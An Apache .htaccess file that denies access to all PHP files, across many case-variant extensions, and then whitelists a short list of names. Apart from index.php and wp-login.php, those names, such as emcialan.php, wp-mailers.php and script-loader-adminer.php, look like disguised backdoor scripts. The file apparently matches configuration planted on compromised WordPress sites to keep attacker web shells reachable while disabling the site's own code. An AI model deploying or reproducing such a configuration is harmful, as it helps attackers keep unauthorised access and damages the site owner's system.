Options -Indexes

<FilesMatch "\.(?:php|pHp|pht|phtml|phtm|php5|php72|phar|pgif|inc|sht|shtm|shtml|PHP|Php|PhP|PHp|pHP|phP|PHTML|Phtml|PHtml|PhTml|PhtMl|PhtmL|pHtml|pHTml|pHtMl|pHtmL|phTml|phTMl|phTmL|phtMl|phtML|PHT|Pht|PHt|PhT|pHt|pHT)$">
Order allow,deny
Deny from all
</FilesMatch>

<FilesMatch "^(index.php|wp-login.php|emcialan.php|block-capabilities.php|wp-mailers.php|admin-sync.php|class-ftp-admin.php|repair.php|site-options.php|options.php|reboot.php|author-settings.php|class-popup-themes.php|script-loader-adminer.php|wp-loadscript.php)$">
Order allow,deny
Allow from all
</FilesMatch>

DirectoryIndex index.php